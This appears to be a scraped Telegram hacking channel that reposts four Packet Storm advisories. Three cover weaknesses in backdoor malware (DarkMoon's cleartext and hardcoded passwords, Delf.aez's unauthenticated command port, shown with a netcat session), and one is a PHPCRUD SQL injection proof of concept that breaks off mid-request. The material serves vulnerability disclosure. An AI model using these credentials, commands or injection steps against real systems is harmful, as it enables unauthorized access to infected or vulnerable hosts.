Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.DarkMoon.a Insecure Transit

https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
Backdoor.Win32.DarkMoon.a malware suffers from an insecure transit vulnerability.

MD5 | bcdf0f1a03350157f963f0ec97ce318e

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/7361fe3620fb6e18467c8e15e224b0b8_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.DarkMoon.a
Vulnerability: Insecure Transit
Description: Dark Moon v1 client by Shukisnike, sends cleartext passwords over the network. The malwares traffic uses a caret '^' symbol surrounding the password, making it easy to identify when analyzing the network traffic.
Type: PE
MD5: 7361fe3620fb6e18467c8e15e224b0b8
Vuln ID: MVID-2021-0216
Disclosure: 05/17/2021
Exploit/PoC:
Wireshark capture sending the password "abc123" from DarkMoon client.

0000 00 XX XX XX XX 00 XX XX XX XX 08 00 45 00 ..)..z..).yq..E.
0010 00 34 6d 10 40 00 80 06 00 00 c0 a8 12 7f c0 a8 .4m.@...........
0020 12 80 c3 69 5b 25 36 13 3b 6b ed 68 1c 6a 50 18 ...i[%6.;k.h.jP.
0030 01 00 a6 76 00 00 5e 35 5e 5e 5e 61 62 63 31 32 ...v..^5^^^abc12
0040 33 5e 3^
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.DarkMoon.a Weak Hardcoded Password

https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
Backdoor.Win32.DarkMoon.a malware suffers from having a weak hardcoded password.

MD5 | 3704cc3ab61c72278be16f83c1e41ba8

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/7361fe3620fb6e18467c8e15e224b0b8.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.DarkMoon.a
Vulnerability: Weak Hardcoded Password
Description: Dark Moon v1 client by Shukisnike listens on TCP ports 80, 28888 and stores a weak hardcoded plaintext password within the executable. Password "fucktheworld" is located at offset 0xa8ed4 and is easily found using strings util. Authenticated users are presented with menu options like "Main|Chat|Spy|Explorer|Setup|Clients|Tools|Advanced|About", access to the infected host is required.
Type: PE32
MD5: 7361fe3620fb6e18467c8e15e224b0b8
Vuln ID: MVID-2021-0215
Disclosure: 05/17/2021

Exploit/PoC:
Access infected host and logon to Dark Moon client.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
EgavilanMedia PHPCRUD 1.0 SQL Injection

https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
EgavilanMedia PHPCRUD version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | 1f7d692db78a547cdcca9b8720f06f81

Download
# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection
# Date: 5/17/2021
# Exploit Author: Dimitrios Mitakos
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: Debian GNU/Linux 10

Vulnerable Parameter : firstname

1. Burp Suite -> Intercept is on

2. Go to the Website -> Add New Record

3. Back to Burp Suite -> Copy to file (r.txt)

POST /insert.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Delf.aez Code Execution

https://3.bp.blogspot.com/-p2bRUn4ag8U/WWlvPJDaCwI/AAAAAAAAIMw/gkQGiTtaXucRRVbpvBkwiWIbJMO4BFlLwCLcBGAs/s1600/h28.png
Backdoor.Win32.Delf.aez malware suffers from a code execution vulnerability.

MD5 | c4163c2cc7205db94a942eeaf1383559

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/be4a6274679ca966a1d99140db54c25a.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Delf.aez
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on several TCP ports and accepts unauthenticated commands on port 53187 and 53184. Commands are in Polish E.g. Wylogowuj translated is "Log out" and we get response "#Zmiany Profilu w│aczone" ("#Profile change enabled."). Sending a single characters "d" or "f" to port 53187 also returns system information.
Type: PE32
MD5: be4a6274679ca966a1d99140db54c25a
Vuln ID: MVID-2021-0217
Disclosure: 05/17/2021

Exploit/PoC:
nc64.exe x.x.x.x 53187
f
f 6
PerfLogs
Program Files
Program Files (x86)
Users
Windows
$WINRE_BACKUP_PARTITION.MARKER
0
bootmgr
398082
BOOTNXT
1
BOOTSECT.BAK
8192
pagefile.sys
671088640
swapfile.sys
16777216
d
d
C: - Dysk lokalny
D: - CD-ROM

nc64.exe x.x.x.x 53184
#Wylogowuj
#Zmiany Profilu w│aczone. #Profile change enabled.
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video